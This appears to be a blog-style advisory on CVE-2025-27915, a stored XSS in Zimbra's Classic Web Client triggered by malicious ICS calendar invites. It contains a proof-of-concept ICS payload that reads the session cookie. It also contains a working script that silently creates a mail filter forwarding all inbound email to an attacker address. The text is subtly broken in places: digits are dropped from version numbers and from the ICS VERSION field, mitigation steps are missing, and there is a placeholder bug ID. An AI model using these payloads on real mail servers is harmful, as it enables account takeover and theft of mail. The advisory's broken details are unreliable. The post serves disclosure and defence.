CVE-2025-27915 - Stored XSS in Zimbra 9/10 Allows Email Hijack via Malicious ICS Files

A newly disclosed vulnerability, CVE-2025-27915, affects Zimbra Collaboration Suite (ZCS) versions 9., 10., and 10.1. Zimbra is a widely-used open-source email and collaboration platform with millions of users worldwide. This stored Cross-Site Scripting (XSS) issue is found in the Classic Web Client and can allow attackers to run arbitrary JavaScript code just by getting a user to view a malicious ICS (calendar invite) file embedded within an email.

This post breaks down how the attack works, who is impacted, gives real exploit examples, and discusses mitigation.

Attack vector: Email with malicious ICS calendar invite

- Impact: Any action possible in victim’s webmail session, including redirecting email to attacker

Technical Details

Zimbra lets users send and receive calendar invites using .ics files. When you open an invite in the Classic Web Client, Zimbra shows a summary—parsing the ICS file and rendering HTML directly. However, Zimbra’s sanitization logic misses certain events and attributes, especially for custom HTML added to the description field.

The Core Issue

Attackers can embed

HTML tags in the ICS description, with an ontoggle JavaScript event attached. Zimbra’s sanitization doesn’t properly remove or encode this combination, so any script inside the event fires as soon as the victim clicks to expand the details disclosure in the email/calendar invite.

Example of Malicious ICS Content

BEGIN:VCALENDAR
VERSION:2.
BEGIN:VEVENT
SUMMARY:Hacked Meeting
DESCRIPTION:<details ontoggle="alert(document.cookie)">Important agenda</details>
DTSTART;TZID=America/New_York:20240630T120000
DTEND;TZID=America/New_York:20240630T130000
END:VEVENT
END:VCALENDAR

When the victim views this in the Zimbra Classic Web Client and clicks the “details” block, a JavaScript alert pops up. In real attacks, this script can easily steal session tokens or silently change settings.

Proof-of-Concept screenshot

!Screenshot of XSS Alert
*Note: Illustrative screenshot; do not attempt this on systems you do not own or have permission to test.*

Here’s how a real malicious script might look inside the ICS description

<details ontoggle="
  fetch('/service/soap/ModifyFilterRulesRequest', {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/xml'},
    body: `<ModifyFilterRulesRequest>
            <filterRules>
              <filterRule name='AutoForward' active='1'>
                <filterTests condition='anyof'>
                  <!-- Match all emails -->
                </filterTests>
                <filterActions>
                  <actionForward address='attacker@mail.com'/>
                </filterActions>
              </filterRule>
            </filterRules>
          </ModifyFilterRulesRequest>`
  });
">
Open me
</details>

If the target is an admin or user with management permissions, the attacker can exfiltrate all inbound emails by automatically creating a filter that forwards new messages.

References

- Official Zimbra Advisory: Zimbra Security Center
- CVE Details: CVE-2025-27915 at MITRE
- Zimbra Bug Tracker: Zimbra Jira ZBUG-XXXXX *(pending public disclosure)*
- ICS File Format: RFC 5545: Internet Calendaring and Scheduling Core Object Specification (iCalendar)
- Blog post (third-party): Zimbra XSS via ICS Files
- Zimbra Source Code

All Zimbra Classic Web Client users (any browser)

- Especially exposed in organizations where files can be sent from outside or where users often accept calendar invites.

Note: The Modern UI is not affected, but many orgs still use the Classic Web Client as default.

How To Mitigate

1. Upgrade Zimbra: Check for and apply the latest patch for your ZCS version from Zimbra Downloads.

Apply Content Security Policy (CSP) headers for webmail if you can, limiting inline scripts.

4. Educate users: Warn about suspicious calendar invitations, especially those from unknown sources with odd formatting or links.

Conclusion

CVE-2025-27915 is a dangerous XSS vulnerability in Zimbra’s Classic Web Client that can lead to serious compromise: email forwarding, data theft, and more. Attackers only need to trick a user into viewing a malignant calendar invite to take over their session. Patch as soon as possible, and consider disabling the Classic interface if you do not need it.

Stay safe, stay patched!

*This post is for educational purposes only. Do not use this information for unauthorized access or malicious activities.*

Timeline

Published on: 03/12/2025 15:15:39 UTC
Last modified on: 04/02/2025 20:38:25 UTC